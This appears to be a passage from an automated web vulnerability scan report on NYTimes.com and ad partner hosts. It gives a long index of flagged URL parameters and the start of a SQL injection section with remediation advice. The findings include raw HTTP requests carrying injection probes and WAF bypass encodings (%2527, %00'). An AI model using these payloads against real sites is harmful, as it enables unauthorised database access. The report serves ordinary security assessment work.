3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]

3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]

3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]

3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]

3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]

3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]

3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]

3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]

3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]

3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]

3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]

3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]

3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]

3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]

3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]

3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]

3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]

3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]

3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]

3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]

3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]

3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]

3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]

3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]

3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]

3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]

3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]

3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]

3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]

3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]

3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]

3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]

3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]

3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]

3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]

3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]

3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]

3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]

3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]

3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]

3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]

3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]

3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]

3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]

3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]

3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]

3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]

3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]

3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]

3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]

3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]

3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]

3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]

3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]

3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]

3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]

3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]

3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]

3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]

3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]

3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]

3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]

3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]

3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]

3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]

3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]

3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]

3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]

3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]

3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]

3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]

3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]

3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]

3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]

3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]

3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]

3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]

3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]

3.257. https://placead.nytimes.com/default.asp [CategoryID parameter]

3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]

3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]

3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]

3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]

3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]

3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]

3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]

3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]

3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]

3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]

3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]

3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]

3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]

3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]

3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]

3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]

3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]

3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]

3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]

3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]

3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]

3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]

3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]

3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]

3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]

3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter]

3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter]

3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter]

3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]

3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]

3.295. http://video.nytimes.com/ [src parameter]

3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]

3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]

3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]

3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]

3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]

3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]

3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]

3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]

3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]

3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]

3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]

3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]

3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]

3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]

3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]

3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]

3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]

3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]

3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]

3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]

3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]

3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]

3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]

3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]

3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]

3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]

3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]

3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]

3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]

3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]

3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]

3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]

3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]

3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]

3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]

3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]

3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]

3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]

3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]

3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]

3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]

3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]

3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]

3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]

3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]

3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]

3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]

3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]

3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]

3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]

3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]

3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]

3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]

3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]

3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]

3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]

3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]

3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]

3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]

3.379. http://homedelivery.nytimes.com/ [Referer HTTP header]

3.380. http://ipboutiquehotel.com/ [Referer HTTP header]

4. Open redirection



1. SQL injection
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The ad parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ad parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ad request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The camp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the camp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00'&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00''&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
